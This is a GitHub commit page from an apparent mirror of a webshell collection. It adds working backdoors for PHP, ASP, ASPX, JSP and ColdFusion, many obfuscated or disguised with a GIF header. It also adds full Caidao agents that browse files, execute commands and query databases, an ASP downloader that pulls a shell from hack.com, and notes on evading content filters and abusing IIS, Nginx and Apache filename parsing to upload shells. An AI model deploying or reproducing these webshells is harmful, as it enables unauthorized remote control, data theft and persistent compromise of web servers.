mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
update webshell Penetration testing2013 beta
This commit is contained in:
parent
c871f6eb77
commit
733618bc2a
28 changed files with 19943 additions and 0 deletions
19
asp/ice.asp
Normal file
19
asp/ice.asp
Normal file
File diff suppressed because one or more lines are too long
1295
asp/vps提权马.asp
Normal file
1295
asp/vps提权马.asp
Normal file
File diff suppressed because one or more lines are too long
1355
asp/不灭之魂.asp
Normal file
1355
asp/不灭之魂.asp
Normal file
File diff suppressed because one or more lines are too long
2578
aspx/icesword.aspx
Normal file
2578
aspx/icesword.aspx
Normal file
File diff suppressed because it is too large
Load diff
1
caidao-shell/404.php
Normal file
1
caidao-shell/404.php
Normal file
|
@ -0,0 +1 @@
|
|||
<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>
|
BIN
caidao-shell/aspx.jpg
Normal file
BIN
caidao-shell/aspx.jpg
Normal file
Binary file not shown.
After Width: | Height: | Size: 9.7 KiB |
11
caidao-shell/download 下载文件.asp
Normal file
11
caidao-shell/download 下载文件.asp
Normal file
|
@ -0,0 +1,11 @@
|
|||
<%
|
||||
Set xPost = createObject("Microsoft.XMLHTTP")
|
||||
xPost.Open "GET","http://hack.com/shell.txt",0
|
||||
xPost.Send()
|
||||
Set sGet = createObject("ADODB.Stream")
|
||||
sGet.Mode = 3
|
||||
sGet.Type = 1
|
||||
sGet.Open()
|
||||
sGet.Write(xPost.responseBody)
|
||||
sGet.SaveToFile "D:\website\jingsheng\Templates\heise\html\shell.asp",2
|
||||
%>
|
1
caidao-shell/fuck.php
Normal file
1
caidao-shell/fuck.php
Normal file
|
@ -0,0 +1 @@
|
|||
<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>
|
1
caidao-shell/guo.php
Normal file
1
caidao-shell/guo.php
Normal file
|
@ -0,0 +1 @@
|
|||
<?php ($www= $_POST['ice']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>
|
22
caidao-shell/hkmjj.asp
Normal file
22
caidao-shell/hkmjj.asp
Normal file
|
@ -0,0 +1,22 @@
|
|||
<%
|
||||
codeds="Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li"
|
||||
execute (decode (codeds) )
|
||||
Function DeCode (Coded)
|
||||
On Error Resume Next
|
||||
For i = 1 To Len (Coded)
|
||||
Curchar = Mid (Coded, i, 1)
|
||||
If Asc (Curchar) = 16 then
|
||||
Curchar = chr (8)
|
||||
Elseif Asc (Curchar) = 24 then
|
||||
Curchar = chr (12)
|
||||
Elseif Asc (Curchar) = 32 then
|
||||
Curchar = chr (18)
|
||||
Else
|
||||
Curchar = chr (Asc (Curchar) -3)
|
||||
End if
|
||||
DeCode = Decode&Curchar
|
||||
Next
|
||||
End Function
|
||||
'response.write(decode(codeds))
|
||||
' ²Ëµ¶Á¬½Ó /hkmjj.asp?xx=x ,ÃÜÂë hkmjj
|
||||
%>
|
2
caidao-shell/ice.asp
Normal file
2
caidao-shell/ice.asp
Normal file
|
@ -0,0 +1,2 @@
|
|||
GIF89a
|
||||
<%eval request("ice")%>
|
After Width: | Height: | Size: 30 B |
2
caidao-shell/ice.aspx
Normal file
2
caidao-shell/ice.aspx
Normal file
|
@ -0,0 +1,2 @@
|
|||
GIF89a
|
||||
<%@ Page Language="Jscript"%><%eval(Request.Item["ice"],"unsafe");%>
|
After Width: | Height: | Size: 75 B |
27
caidao-shell/ice.cfm
Normal file
27
caidao-shell/ice.cfm
Normal file
|
@ -0,0 +1,27 @@
|
|||
<CFSET O="" /><CFTRY><CFSWITCH EXPRESSION=#Form.ice#><CFCASE VALUE="A"><CFSCRIPT>O=O&Expandpath("./")&Chr(9);
|
||||
for(c=65;c lt 91;c=c+1){if(DirectoryExists(Chr(c)&":\"))O=O&Chr(c)&":";}</CFSCRIPT></CFCASE><CFCASE VALUE="B">
|
||||
<CFDIRECTORY DIRECTORY="#Form.z1#" NAME="D" SORT="Type"><CFLOOP Query="D"><CFSCRIPT>O=O&D.Name;If(D.Type eq "Dir")O=O&"/";
|
||||
O=O&Chr(9)&DateFormat(D.DateLastModified,"yyyy-mm-dd")&TimeFormat(D.DateLastModified," HH:MM:ss")&Chr(9)&D.Size&Chr(9);
|
||||
If(Left(Form.z1,1) eq "/"){O=O&D.Mode;}else{O=O&D.Attributes;}O=O&Chr(10);</CFSCRIPT></CFLOOP></CFCASE><CFCASE VALUE="C">
|
||||
<CFFILE ACTION="Read" FILE="#Form.z1#" VARIABLE="O"></CFCASE><CFCASE VALUE="D"><CFFILE ACTION="Write" FILE="#Form.z1#" OUTPUT="#Form.z2#">
|
||||
<CFSET O="1" /></CFCASE><CFCASE VALUE="E"><CFSCRIPT>Function DF(P){F=CreateObject("java","java.io.File").init(P);L=0;i=0;
|
||||
if(F.isDirectory()){L=F.listFiles();for(i=1;i lte ArrayLen(L);i=i+1){if(not L[i].delete()){DF(L[i].getPath());}}}F.delete();}
|
||||
DF(Form.z1);O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="F"><cffile action="readbinary" file="#Form.z1#" variable="B" />
|
||||
<cfset J=CreateObject("java","java.nio.ByteBuffer") /><cfset X=J.Allocate(JavaCast( "int", ArrayLen(B)+6)) />
|
||||
<cfset X.Put(ToBinary(ToBase64("->"&"|")), JavaCast("int",0), 3 ) /><cfset X.Put(B, JavaCast("int",0), JavaCast("int",ArrayLen(B)) ) />
|
||||
<cfset X.Put(ToBinary(ToBase64("|"&"<-")), JavaCast("int",0), 3 ) /><CFCONTENT Type="application/octet-stream" Variable="#X.Array()#">
|
||||
<CFABORT></CFCASE><CFCASE VALUE="G"><CFSCRIPT>F=CreateObject("java","java.io.FileOutputStream");F.init(Form.z1);
|
||||
h="0123456789ABCDEF";C=Form.z2;for(i=0;i lt Len(C);i=i+2){F.write(BitOr(BitSHLN(h.indexOf(C.charAt(i)),4),h.indexOf(C.charAt(i+1))));}
|
||||
F.close();O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="H"><CFFUNCTION Name="cpf"><CFARGUMENT Name="S"><CFARGUMENT Name="D">
|
||||
<CFFILE ACTION="Copy" SOURCE="#S#" DESTINATION="#D#"></CFFUNCTION><CFSCRIPT>Function CP(S,D){sf=CreateObject("java","java.io.File").init(S);
|
||||
df=CreateObject("java","java.io.File").init(D);L=0;i=0;if(sf.isDirectory()){if(not df.exists()){df.mkdir();}L=sf.listFiles();
|
||||
for(i=1;i lte ArrayLen(L);i=i+1){if(L[i].isDirectory()){CP(L[i].getPath(),df.getPath()&"/"&L[i].getName());}else{
|
||||
cpf(L[i].getPath(),df.getPath()&"/"&L[i].getName());}}}else{cpf(S,D);}}CP(Form.z1,Form.z2);O="1";</CFSCRIPT></CFCASE>
|
||||
<CFCASE VALUE="I"><CFFILE ACTION="MOVE" SOURCE="#Form.z1#" DESTINATION="#Form.z2#"><CFSET O="1" /></CFCASE><CFCASE VALUE="J">
|
||||
<CFDIRECTORY Directory="#Form.z1#" Action="Create"><CFSET O="1" /></CFCASE><CFCASE VALUE="K"><CFSCRIPT>
|
||||
FileSetLastModified(Form.z1,ParseDateTime(Form.z2));O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="L"><CFSCRIPT>Z=Form.z2;
|
||||
For(i=Len(Z);i gt 0;i=i-1){if(Mid(Z,i,1) eq "/" Or Mid(Z,i,1) eq "\"){Break;}}P=Left(Z,i);F=Mid(Z,i+1,256);</CFSCRIPT>
|
||||
<CFHTTP METHOD="Get" URL="#Form.z1#" PATH="#P#" FILE="#F#"><CFSET O="1" /></CFCASE><CFCASE VALUE="M">
|
||||
<CFEXECUTE Name="#Mid(Form.z1,3,Len(Form.z1)-2)#" Arguments="#Mid(Form.z1,1,2)# #Form.z2#" Variable="O" TimeOut="60" />
|
||||
</CFCASE></CFSWITCH><CFCATCH Type="Any"><CFSET O="ERROR:// "&CFCatch.Message /></CFCATCH>
|
||||
</CFTRY><CFOUTPUT>->#Chr(124)&O&Chr(124)#<-</CFOUTPUT>
|
BIN
caidao-shell/ice.jpg
Normal file
BIN
caidao-shell/ice.jpg
Normal file
Binary file not shown.
After Width: | Height: | Size: 8.8 KiB |
59
caidao-shell/ice.jsp
Normal file
59
caidao-shell/ice.jsp
Normal file
|
@ -0,0 +1,59 @@
|
|||
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
|
||||
<%!
|
||||
String Pwd="ice";
|
||||
String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);}
|
||||
Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance();
|
||||
Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;}
|
||||
void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}
|
||||
void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt;
|
||||
SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;i<l.length;i++){dt=new java.util.Date(l[i].lastModified());
|
||||
sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n");}
|
||||
else{sF+=l[i].getName()+"\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n";}}sb.append(sF);}
|
||||
void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();
|
||||
for(int k=0;k<x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}
|
||||
void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();
|
||||
ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));
|
||||
os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}
|
||||
void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();
|
||||
FileOutputStream os=new FileOutputStream(f);for(int i=0;i<d.length();i+=2)
|
||||
{os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))));}os.close();}
|
||||
void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();
|
||||
for(int j=0;j<z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}
|
||||
}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);
|
||||
int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}
|
||||
void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}
|
||||
void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
|
||||
java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}
|
||||
void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d);
|
||||
HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];
|
||||
while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}
|
||||
void MM(InputStream is, StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));
|
||||
while((l=br.readLine())!=null){sb.append(l+"\r\n");}}
|
||||
void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs();
|
||||
while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();}
|
||||
void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t);
|
||||
while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();}
|
||||
void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("\r\n");Connection c=GC(s);
|
||||
Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData();
|
||||
for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();}
|
||||
void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008);
|
||||
try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i<=n;i++){sb.append(d.getColumnName(i)+"\t|\t");
|
||||
}sb.append("\r\n");while(r.next()){for(i=1;i<=n;i++){sb.append(EC(r.getString(i),cs)+"\t|\t");}sb.append("\r\n");}r.close();}
|
||||
catch(Exception e){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n");
|
||||
}catch(Exception ee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();}
|
||||
%><%
|
||||
String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);
|
||||
String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);
|
||||
StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|");
|
||||
if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}
|
||||
else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
|
||||
while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}
|
||||
else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
|
||||
bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}
|
||||
else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}
|
||||
else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}
|
||||
else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);
|
||||
MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}
|
||||
else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}
|
||||
}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString());
|
||||
%>
|
1
caidao-shell/ice.php
Normal file
1
caidao-shell/ice.php
Normal file
|
@ -0,0 +1 @@
|
|||
<?php ${${eval($_POST[ice])}};?>
|
BIN
caidao-shell/mdb.asp
Normal file
BIN
caidao-shell/mdb.asp
Normal file
Binary file not shown.
BIN
caidao-shell/php.jpg
Normal file
BIN
caidao-shell/php.jpg
Normal file
Binary file not shown.
After Width: | Height: | Size: 7.9 KiB |
86
caidao-shell/说明.log
Normal file
86
caidao-shell/说明.log
Normal file
|
@ -0,0 +1,86 @@
|
|||
GIF89a 图片头
|
||||
|
||||
[+]---------------------------------PHP---------------------------------[+]
|
||||
<?php @eval($_POST['ice']);?>
|
||||
|
||||
<?php header('status:404');${${eval($_POST[ice])}};?>
|
||||
|
||||
<?php ($www= $_POST['ice']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>
|
||||
|
||||
<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>
|
||||
|
||||
|
||||
<?fputs(fopen("ice.php","w"),"<?eval(\$_POST[ice]);?>")?>
|
||||
|
||||
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
|
||||
// 同目录生成 ice.php
|
||||
|
||||
[+]---------------------------------PHP---------------------------------[+]
|
||||
|
||||
|
||||
|
||||
***************************************************************************
|
||||
|
||||
|
||||
|
||||
[+]---------------------------------ASP---------------------------------[+]
|
||||
<%eval request("ice")%>
|
||||
|
||||
<%www=REquEst("ice"):EvaL(www)%>
|
||||
|
||||
<%
|
||||
Dim ConKey:ConKey="ice"
|
||||
Dim InValue:InValue=Request(ConKey)
|
||||
eval(InValue)
|
||||
%>
|
||||
|
||||
<%E=request("ice") execute E%>
|
||||
|
||||
<%
|
||||
Set xPost = createObject("Microsoft.XMLHTTP")
|
||||
xPost.Open "GET","http://www.xxx.com/shell.txt",0 'asp木马文本格式地址
|
||||
xPost.Send()
|
||||
Set sGet = createObject("ADODB.Stream")
|
||||
sGet.Mode = 3
|
||||
sGet.Type = 1
|
||||
sGet.Open()
|
||||
sGet.Write(xPost.responseBody)
|
||||
sGet.SaveToFile "E:\WWWROOT\xxx.asp",2
|
||||
%>
|
||||
|
||||
|
||||
┼攠數畣整爠煥敵瑳∨≡┩愾 // ANSI—>Unicode ,密码: a
|
||||
┼攠數畣整爠煥敵瑳∨捩≥┩愾 //密码 ice
|
||||
|
||||
|
||||
|
||||
上传一个图片一句话(xxx.jpg)。再上传一个.asp文件去包含: <!--#include file="xxx.jpg" -->
|
||||
|
||||
|
||||
[+]---------------------------------ASP---------------------------------[+]
|
||||
|
||||
|
||||
|
||||
***************************************************************************
|
||||
|
||||
|
||||
|
||||
[+]---------------------------------ASPX---------------------------------[+]
|
||||
|
||||
<%@ Page Language="Jscript"%><%eval(Request.Item["ice"],"unsafe");%>
|
||||
|
||||
<%@ Page Language="C#" ValidateRequest="false" %>
|
||||
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["ice"].Value))).CreateInstance("c",true,System.Reflection.BindingFlags.Default,null,new object[] { this },null,null);}catch{ }%>
|
||||
|
||||
[+]---------------------------------ASPX---------------------------------[+]
|
||||
|
||||
IIS 6.0 解析: x.asp/x.jpg x.asp;x.jpg ;如果遇到安全狗,畸形会被拦截,可以尝试将一句话的文件名改为 ;x.asp;x.jpg (IIS 7.5 可以试试 a.aspx.a;.a.aspx.jpg..jpg 这样的)
|
||||
Nginx 解析: x.jpg/.php x.jpg%00.php
|
||||
Apache : x.php.x
|
||||
xx.jpg.jsp,xx.png.jsp
|
||||
|
||||
|
||||
以上为 php、asp、aspx一句话木马的客户端,密码均为 ice 。这是一句话的几种写法,有些可以逃过内容审查
|
||||
|
||||
-- 冰锋刺客 --
|
||||
2012-07-21
|
1808
jsp/icesword.jsp
Normal file
1808
jsp/icesword.jsp
Normal file
File diff suppressed because it is too large
Load diff
993
jsp/suiyue.jsp
Normal file
993
jsp/suiyue.jsp
Normal file
|
@ -0,0 +1,993 @@
|
|||
<%
|
||||
/**
|
||||
JFolder V0.9 windows platform
|
||||
@Filename: JFolder.jsp
|
||||
@Description: 一个简单的系统文件目录显示程序,类似于资源管理器,提供基本的文件操作,不过功能较弱。
|
||||
|
||||
@Bugs : 下载时,中文文件名无法正常显示123456789
|
||||
*/
|
||||
%>
|
||||
<%@ page contentType="text/html;charset=gb2312"%>
|
||||
<%@page import="java.io.*,java.util.*,java.net.*" %>
|
||||
<%!
|
||||
private final static int languageNo=0; //语言版本,0 : 中文; 1:英文
|
||||
String strThisFile="JFolder.jsp";
|
||||
String[] authorInfo={" <font color=red> 岁月-版权【冰锋刺客-整理】 </font>"," <font color=red> Thanks for your support - - by Syue http://www.syue.com </font>"};
|
||||
String[] strFileManage = {"文 件 管 理","File Management"};
|
||||
String[] strCommand = {"CMD 命 令","Command Window"};
|
||||
String[] strSysProperty = {"系 统 属 性","System Property"};
|
||||
String[] strHelp = {"帮 助","Help"};
|
||||
String[] strParentFolder = {"上级目录","Parent Folder"};
|
||||
String[] strCurrentFolder= {"当前目录","Current Folder"};
|
||||
String[] strDrivers = {"驱动器","Drivers"};
|
||||
String[] strFileName = {"文件名称","File Name"};
|
||||
String[] strFileSize = {"文件大小","File Size"};
|
||||
String[] strLastModified = {"最后修改","Last Modified"};
|
||||
String[] strFileOperation= {"文件操作","Operations"};
|
||||
String[] strFileEdit = {"修改","Edit"};
|
||||
String[] strFileDown = {"下载","Download"};
|
||||
String[] strFileCopy = {"复制","Move"};
|
||||
String[] strFileDel = {"删除","Delete"};
|
||||
String[] strExecute = {"执行","Execute"};
|
||||
String[] strBack = {"返回","Back"};
|
||||
String[] strFileSave = {"保存","Save"};
|
||||
|
||||
public class FileHandler
|
||||
{
|
||||
private String strAction="";
|
||||
private String strFile="";
|
||||
void FileHandler(String action,String f)
|
||||
{
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
public static class UploadMonitor {
|
||||
|
||||
static Hashtable uploadTable = new Hashtable();
|
||||
|
||||
static void set(String fName, UplInfo info) {
|
||||
uploadTable.put(fName, info);
|
||||
}
|
||||
|
||||
static void remove(String fName) {
|
||||
uploadTable.remove(fName);
|
||||
}
|
||||
|
||||
static UplInfo getInfo(String fName) {
|
||||
UplInfo info = (UplInfo) uploadTable.get(fName);
|
||||
return info;
|
||||
}
|
||||
}
|
||||
|
||||
public class UplInfo {
|
||||
|
||||
public long totalSize;
|
||||
public long currSize;
|
||||
public long starttime;
|
||||
public boolean aborted;
|
||||
|
||||
public UplInfo() {
|
||||
totalSize = 0l;
|
||||
currSize = 0l;
|
||||
starttime = System.currentTimeMillis();
|
||||
aborted = false;
|
||||
}
|
||||
|
||||
public UplInfo(int size) {
|
||||
totalSize = size;
|
||||
currSize = 0;
|
||||
starttime = System.currentTimeMillis();
|
||||
aborted = false;
|
||||
}
|
||||
|
||||
public String getUprate() {
|
||||
long time = System.currentTimeMillis() - starttime;
|
||||
if (time != 0) {
|
||||
long uprate = currSize * 1000 / time;
|
||||
return convertFileSize(uprate) + "/s";
|
||||
}
|
||||
else return "n/a";
|
||||
}
|
||||
|
||||
public int getPercent() {
|
||||
if (totalSize == 0) return 0;
|
||||
else return (int) (currSize * 100 / totalSize);
|
||||
}
|
||||
|
||||
public String getTimeElapsed() {
|
||||
long time = (System.currentTimeMillis() - starttime) / 1000l;
|
||||
if (time - 60l >= 0){
|
||||
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
|
||||
else return time / 60 + ":0" + (time % 60) + "m";
|
||||
}
|
||||
else return time<10 ? "0" + time + "s": time + "s";
|
||||
}
|
||||
|
||||
public String getTimeEstimated() {
|
||||
if (currSize == 0) return "n/a";
|
||||
long time = System.currentTimeMillis() - starttime;
|
||||
time = totalSize * time / currSize;
|
||||
time /= 1000l;
|
||||
if (time - 60l >= 0){
|
||||
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
|
||||
else return time / 60 + ":0" + (time % 60) + "m";
|
||||
}
|
||||
else return time<10 ? "0" + time + "s": time + "s";
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
public class FileInfo {
|
||||
|
||||
public String name = null, clientFileName = null, fileContentType = null;
|
||||
private byte[] fileContents = null;
|
||||
public File file = null;
|
||||
public StringBuffer sb = new StringBuffer(100);
|
||||
|
||||
public void setFileContents(byte[] aByteArray) {
|
||||
fileContents = new byte[aByteArray.length];
|
||||
System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
|
||||
}
|
||||
}
|
||||
|
||||
// A Class with methods used to process a ServletInputStream
|
||||
public class HttpMultiPartParser {
|
||||
|
||||
private final String lineSeparator = System.getProperty("line.separator", "\n");
|
||||
private final int ONE_MB = 1024 * 1;
|
||||
|
||||
public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
|
||||
int clength) throws IllegalArgumentException, IOException {
|
||||
if (is == null) throw new IllegalArgumentException("InputStream");
|
||||
if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
|
||||
"\"" + boundary + "\" is an illegal boundary indicator");
|
||||
boundary = "--" + boundary;
|
||||
StringTokenizer stLine = null, stFields = null;
|
||||
FileInfo fileInfo = null;
|
||||
Hashtable dataTable = new Hashtable(5);
|
||||
String line = null, field = null, paramName = null;
|
||||
boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
|
||||
boolean isFile = false;
|
||||
if (saveFiles) { // Create the required directory (including parent dirs)
|
||||
File f = new File(saveInDir);
|
||||
f.mkdirs();
|
||||
}
|
||||
line = getLine(is);
|
||||
if (line == null || !line.startsWith(boundary)) throw new IOException(
|
||||
"Boundary not found; boundary = " + boundary + ", line = " + line);
|
||||
while (line != null) {
|
||||
if (line == null || !line.startsWith(boundary)) return dataTable;
|
||||
line = getLine(is);
|
||||
if (line == null) return dataTable;
|
||||
stLine = new StringTokenizer(line, ";\r\n");
|
||||
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
|
||||
"Bad data in second line");
|
||||
line = stLine.nextToken().toLowerCase();
|
||||
if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
|
||||
"Bad data in second line");
|
||||
stFields = new StringTokenizer(stLine.nextToken(), "=\"");
|
||||
if (stFields.countTokens() < 2) throw new IllegalArgumentException(
|
||||
"Bad data in second line");
|
||||
fileInfo = new FileInfo();
|
||||
stFields.nextToken();
|
||||
paramName = stFields.nextToken();
|
||||
isFile = false;
|
||||
if (stLine.hasMoreTokens()) {
|
||||
field = stLine.nextToken();
|
||||
stFields = new StringTokenizer(field, "=\"");
|
||||
if (stFields.countTokens() > 1) {
|
||||
if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
|
||||
fileInfo.name = paramName;
|
||||
String value = stFields.nextToken();
|
||||
if (value != null && value.trim().length() > 0) {
|
||||
fileInfo.clientFileName = value;
|
||||
isFile = true;
|
||||
}
|
||||
else {
|
||||
line = getLine(is); // Skip "Content-Type:" line
|
||||
line = getLine(is); // Skip blank line
|
||||
line = getLine(is); // Skip blank line
|
||||
line = getLine(is); // Position to boundary line
|
||||
continue;
|
||||
}
|
||||
}
|
||||
}
|
||||
else if (field.toLowerCase().indexOf("filename") >= 0) {
|
||||
line = getLine(is); // Skip "Content-Type:" line
|
||||
line = getLine(is); // Skip blank line
|
||||
line = getLine(is); // Skip blank line
|
||||
line = getLine(is); // Position to boundary line
|
||||
continue;
|
||||
}
|
||||
}
|
||||
boolean skipBlankLine = true;
|
||||
if (isFile) {
|
||||
line = getLine(is);
|
||||
if (line == null) return dataTable;
|
||||
if (line.trim().length() < 1) skipBlankLine = false;
|
||||
else {
|
||||
stLine = new StringTokenizer(line, ": ");
|
||||
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
|
||||
"Bad data in third line");
|
||||
stLine.nextToken(); // Content-Type
|
||||
fileInfo.fileContentType = stLine.nextToken();
|
||||
}
|
||||
}
|
||||
if (skipBlankLine) {
|
||||
line = getLine(is);
|
||||
if (line == null) return dataTable;
|
||||
}
|
||||
if (!isFile) {
|
||||
line = getLine(is);
|
||||
if (line == null) return dataTable;
|
||||
dataTable.put(paramName, line);
|
||||
// If parameter is dir, change saveInDir to dir
|
||||
if (paramName.equals("dir")) saveInDir = line;
|
||||
line = getLine(is);
|
||||
continue;
|
||||
}
|
||||
try {
|
||||
UplInfo uplInfo = new UplInfo(clength);
|
||||
UploadMonitor.set(fileInfo.clientFileName, uplInfo);
|
||||
OutputStream os = null;
|
||||
String path = null;
|
||||
if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
|
||||
fileInfo.clientFileName));
|
||||
else os = new ByteArrayOutputStream(ONE_MB);
|
||||
boolean readingContent = true;
|
||||
byte previousLine[] = new byte[2 * ONE_MB];
|
||||
byte temp[] = null;
|
||||
byte currentLine[] = new byte[2 * ONE_MB];
|
||||
int read, read3;
|
||||
if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
|
||||
line = null;
|
||||
break;
|
||||
}
|
||||
while (readingContent) {
|
||||
if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
|
||||
line = null;
|
||||
uplInfo.aborted = true;
|
||||
break;
|
||||
}
|
||||
if (compareBoundary(boundary, currentLine)) {
|
||||
os.write(previousLine, 0, read - 2);
|
||||
line = new String(currentLine, 0, read3);
|
||||
break;
|
||||
}
|
||||
else {
|
||||
os.write(previousLine, 0, read);
|
||||
uplInfo.currSize += read;
|
||||
temp = currentLine;
|
||||
currentLine = previousLine;
|
||||
previousLine = temp;
|
||||
read = read3;
|
||||
}//end else
|
||||
}//end while
|
||||
os.flush();
|
||||
os.close();
|
||||
if (!saveFiles) {
|
||||
ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
|
||||
fileInfo.setFileContents(baos.toByteArray());
|
||||
}
|
||||
else fileInfo.file = new File(path);
|
||||
dataTable.put(paramName, fileInfo);
|
||||
uplInfo.currSize = uplInfo.totalSize;
|
||||
}//end try
|
||||
catch (IOException e) {
|
||||
throw e;
|
||||
}
|
||||
}
|
||||
return dataTable;
|
||||
}
|
||||
|
||||
/**
|
||||
* Compares boundary string to byte array
|
||||
*/
